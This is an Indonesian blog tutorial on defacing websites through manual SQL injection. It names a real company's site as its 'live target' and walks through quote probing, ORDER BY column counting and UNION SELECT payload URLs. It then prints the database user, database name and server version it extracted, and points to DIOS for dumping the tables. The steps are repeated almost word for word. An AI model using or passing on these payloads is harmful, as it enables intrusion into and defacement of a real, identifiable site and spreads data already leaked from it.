Tutorial Deface Dengan Cara SQL Injection Manual
Selamat pagi sobat, kali ini admin akan membagikan terkait tutorial Deface Dengan Cara SQL Injection Manual beberapa hari yang lalu saya sudah memberikan Tutorial Deface elFinder Lengkap Dengan Upload Shell dan sekarang admin akan memberikan caranya dengan cara manual
Mau tahu caranya guys. yuuk langsung aja kita simak di bawah ini.
LIVE TARGET : http://garudatransindonesia.com/artikel.php?id=9
1. Untuk inject nya lebih mudah pakai Mozilla firefox + hackbar ya :D
2. Masukkan payload ( ' ) *tanpa tanda kurung , di akhir URL, maka website akan blank, menandakan bahwa web tersebut vuln SQL Injection
http://garudatransindonesia.com/artikel.php?id=9'
3. Selanjutnya beri tanda ( -- - ) di akhir url, contoh seperti ini
http://garudatransindonesia.com/artikel.php?id=9'-- -
Jika web kembali menampilkan artikel secara normal, berarti vuln SQLI
4. Sekarang kita memakai order+by untuk mencari error nya dimana
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+2-- - = NO ERROR/ BLANK
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+5-- - = NO ERROR/ BLANK
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+6-- - = ERROR / BLANK
5. Karena order by error nya di nomor 6, sekarang kita union select , untuk mencari column nya di nomor berapa beri tanda ( . ) di belakang parameter nya
Union select di nomor 5, karena order by nya error di nomor 6
http://garudatransindonesia.com/artikel.php?id=.9'+UNION+ALL+SELECT+1,2,3,4,5-- -
6. Yap udh ketemu ya nomor column nya yaitu di angka 2, sekarang kita mencari tau user, database , dan version nya, caranya? kita beri basic statement di menu hackbar kalian
Atau juga bisa memakai payload ini, taruh di letak angka 2
Payload = CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())
http://garudatransindonesia.com/artikel.php?id=.9'+UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5-- -
7, Dan taraaaa, kita sudah mendapatkan user , database , dan version nya
Untuk mencari table tablenya, tinggal hapus aja payload nya, lalu memakai DIOS yang tersedia di hackbar :D
Demiakianlah Tutorial Deface Dengan Cara SQL Injection Manual yang semoga bermanfaat untu rekan-rekan semuanya. dan jika ada yang masih bingung silahkan tinggalkan komentar pada kolom di bawah ini, Sekian dan terimakasih.
Mau tahu caranya guys. yuuk langsung aja kita simak di bawah ini.
LIVE TARGET : http://garudatransindonesia.com/artikel.php?id=9
1. Untuk inject nya lebih mudah pakai Mozilla firefox + hackbar ya :D
2. Masukkan payload ( ' ) *tanpa tanda kurung , di akhir URL, maka website akan blank, menandakan bahwa web tersebut vuln SQL Injection
http://garudatransindonesia.com/artikel.php?id=9'
3. Selanjutnya beri tanda ( -- - ) di akhir url, contoh seperti ini
http://garudatransindonesia.com/artikel.php?id=9'-- -
Jika web kembali menampilkan artikel secara normal, berarti vuln SQLI
4. Sekarang kita memakai order+by untuk mencari error nya dimana
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+2-- - = NO ERROR/ BLANK
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+5-- - = NO ERROR/ BLANK
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+6-- - = ERROR / BLANK
5. Karena order by error nya di nomor 6, sekarang kita union select , untuk mencari column nya di nomor berapa beri tanda ( . ) di belakang parameter nya
Union select di nomor 5, karena order by nya error di nomor 6
http://garudatransindonesia.com/artikel.php?id=.9'+UNION+ALL+SELECT+1,2,3,4,5-- -
6. Yap udh ketemu ya nomor column nya yaitu di angka 2, sekarang kita mencari tau user, database , dan version nya, caranya? kita beri basic statement di menu hackbar kalian
Atau juga bisa memakai payload ini, taruh di letak angka 2
Payload = CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())
http://garudatransindonesia.com/artikel.php?id=.9'+UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5-- -
7, Dan taraaaa, kita sudah mendapatkan user , database , dan version nya
- User : u2232528_garudatrans@localhost
- Database : u2232528_garuda
- Version : 10.2.17-MariaDB
Untuk mencari table tablenya, tinggal hapus aja payload nya, lalu memakai DIOS yang tersedia di hackbar :D
Demiakianlah Tutorial Deface Dengan Cara SQL Injection Manual yang semoga bermanfaat untu rekan-rekan semuanya. dan jika ada yang masih bingung silahkan tinggalkan komentar pada kolom di bawah ini, Sekian dan terimakasih.
Open Comments
Close Comments